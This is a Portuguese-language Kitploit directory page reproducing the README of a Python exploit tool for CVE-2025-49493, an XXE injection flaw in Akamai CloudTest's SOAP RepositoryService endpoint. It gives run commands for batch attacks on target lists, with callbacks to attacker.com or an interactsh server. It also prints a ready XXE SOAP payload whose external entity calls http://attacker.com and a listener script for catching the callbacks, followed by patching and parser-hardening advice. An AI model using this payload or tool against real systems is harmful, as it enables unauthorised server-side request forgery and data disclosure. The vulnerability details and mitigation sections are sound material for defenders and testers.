Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-49493 — Este é um exploit baseado em Python para CVE-2025-49493, que afeta versões do Akamai CloudTest anteriores a 60 2025.06.02 (12988). A vulnerabilidade permite injeção de XML External Entity (XXE) através do endpoint de serviço SOAP. | Kitploit
Ferramentas/GitHubGitHub/sh4den/cve-2025-49493
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubsh4den/cve-2025-49493

CVE-2025-49493

Este é um exploit baseado em Python para CVE-2025-49493, que afeta versões do Akamai CloudTest anteriores a 60 2025.06.02 (12988). A vulnerabilidade permite injeção de XML External Entity (XXE) através do endpoint de serviço SOAP.

Ver Repositório
12há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit XXE do Akamai CloudTest (CVE-2025-49493)

Visão Geral

Este é um exploit baseado em Python para CVE-2025-49493, que afeta versões do Akamai CloudTest anteriores a 60 2025.06.02 (12988). A vulnerabilidade permite injeção de Entidade Externa XML (XXE) por meio do endpoint do serviço SOAP.

Detalhes da Vulnerabilidade

  • ID do CVE: CVE-2025-49493
  • Tipo de Vulnerabilidade: Injeção de Entidade Externa XML (XXE)
  • Gravidade: Crítica (CVSS 9.1)
  • Software Afetado: Akamai CloudTest
  • Versões Afetadas: Anteriores a 60 2025.06.02 (12988)
  • Vetor de Ataque: Rede
  • Autenticação Necessária: Não

Detalhes Técnicos

A vulnerabilidade existe no endpoint SOAP /concerto/services/RepositoryService, onde a entrada de XML é processada sem a devida sanitização de entidades externas. Um atacante pode criar payloads XML maliciosos para desencadear ataques XXE, potencialmente levando a:

  • Divulgação de informações
  • SSRF (Server-Side Request Forgery)
  • Negação de Serviço
  • Possível RCE em determinadas configurações

Recursos

  • Descoberta de Alvos: Identifica automaticamente instâncias do Akamai CloudTest
  • Detecção de Vulnerabilidades: Verifica endpoints vulneráveis e indicadores
  • Exploração XXE: Envia requisições SOAP manipuladas com payloads XXE
  • Múltiplos Alvos: Suporta processamento em lote a partir de arquivos de alvos
  • Registro Detalhado: Logs coloridos abrangentes com carimbos de data/hora
  • Tratamento de Erros: Tratamento robusto de erros para problemas de rede

Instalação

Pré-requisitos

  • Python 3.6 ou superior
  • gerenciador de pacotes pip

Dependências

Instale os pacotes necessários:

root@kitploit:~
pip install -r requirements.txt

Ou instale manualmente:

root@kitploit:~
pip install requests urllib3 colored pyfiglet

Uso

Uso Básico

root@kitploit:~
python main.py targets.txt xxe.attacker.com

Uso Avançado

root@kitploit:~
# With custom timeout
python main.py targets.txt collaborator.burp.com --timeout 20

# Using interactsh for OOB detection
python main.py targets.txt attacker.interactsh.com

Opções de Linha de Comando

root@kitploit:~
positional arguments:
  targets              Target file containing list of Akamai CloudTest hosts
  xxe_server          XXE server to capture requests (e.g., attacker.com or IP)

optional arguments:
  -h, --help          show this help message and exit
  --timeout TIMEOUT   Request timeout in seconds (default: 10)

Formato do Arquivo de Alvos

Crie um arquivo targets.txt com um alvo por linha:

root@kitploit:~
https://example-cloudtest.akamai.com
https://demo-cloudtest.example.com
https://test-cloudtest.internal.company.com
https://cloudtest.example.org

Configurando o Servidor XXE

Opção 1: Usando o Burp Collaborator

  1. Abra o Burp Suite Professional
  2. Vá em Burp > Cliente Burp Collaborator
  3. Clique em "Copy to clipboard" para obter sua URL do collaborator
  4. Use esta URL como o parâmetro xxe_server

Opção 2: Usando o Interactsh

  1. Instale o interactsh: go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
  2. Execute: interactsh-client
  3. Use a URL fornecida como o parâmetro xxe_server

Opção 3: Servidor HTTP Personalizado

Configure um servidor HTTP simples para capturar requisições:

root@kitploit:~
# simple_server.py
import http.server
import socketserver

class RequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        print(f"XXE Request received: {self.path}")
        print(f"Headers: {self.headers}")
        super().do_GET()

with socketserver.TCPServer(("", 8000), RequestHandler) as httpd:
    print("Server running on port 8000")
    httpd.serve_forever()

Fluxo de Exploração

  1. Validação de Alvo: Valida o formato e a acessibilidade da URL
  2. Detecção de Vulnerabilidade:
    • Verifica indicadores do CloudTest na resposta
    • Verifica se o endpoint do serviço SOAP existe
  3. Geração de Payload XXE: Cria um envelope SOAP malicioso com XXE
  4. Exploração: Envia requisição manipulada para o endpoint vulnerável
  5. Análise de Resultados: Analisa a resposta em busca de indicadores de sucesso

Estrutura do Payload XXE

O exploit usa a seguinte estrutura de payload XXE:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
  <!ENTITY xxe SYSTEM "http://attacker.com">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:rep="http://example.com/services/repository">
   <soapenv:Header/>
   <soapenv:Body>
      <rep:getUIBundleObjectXml>
         <rep:uiBundleRequestXml>&xxe;</rep:uiBundleRequestXml>
      </rep:getUIBundleObjectXml>
   </soapenv:Body>
</soapenv:Envelope>

Mitigação

Para Administradores

  1. Ações Imediatas:

    • Atualize o Akamai CloudTest para a versão 60 2025.06.02 ou posterior
    • Monitore os logs em busca de atividades suspeitas de processamento de XML
    • Implemente segmentação de rede para limitar a exposição
  2. Soluções de Longo Prazo:

    • Desative o processamento de entidades externas XML nos parsers XML
    • Implemente validação e sanitização de entrada
    • Use listas de permissão para o processamento de XML
    • Realize avaliações regulares de segurança

Para Desenvolvedores

  1. Processamento Seguro de XML:

    root@kitploit:~
    # Disable external entities in XML parsers
    import xml.etree.ElementTree as ET
    parser = ET.XMLParser()
    parser.parser.DefaultHandler = lambda data: None
    parser.parser.ExternalEntityRefHandler = lambda *args: False
    
  2. Validação de Entrada:

    • Valide toda entrada de XML contra esquemas estritos
    • Sanitize dados controlados pelo usuário antes do processamento de XML
    • Implemente tratamento de erros adequado

Referências

  • Pesquisa original por xbow
  • Changelog do Akamai CloudTest
  • Detalhes do CVE-2025-49493
  • Prevenção de XXE pela OWASP

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de testes autorizados. Os usuários são responsáveis por garantir que possuem a devida autorização antes de testar qualquer sistema. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta.

Contribuição

  1. Faça um fork do repositório
  2. Crie um branch de funcionalidade
  3. Faça suas alterações
  4. Adicione testes, se aplicável
  5. Envie um pull request

Licença

Este projeto é licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.

Autores

  • Pesquisa Original: xbow, 3th1c_yuk1
  • Desenvolvimento do Exploit: Equipe de Pesquisa de Segurança
  • Atribuição do CVE: CVE-2025-49493

Registro de Alterações

v1.0.0

  • Lançamento inicial
  • Funcionalidade básica de exploração XXE
  • Suporte a arquivo de alvos
  • Registro (logging) abrangente
  • Melhorias no tratamento de erros
Baixar ferramenta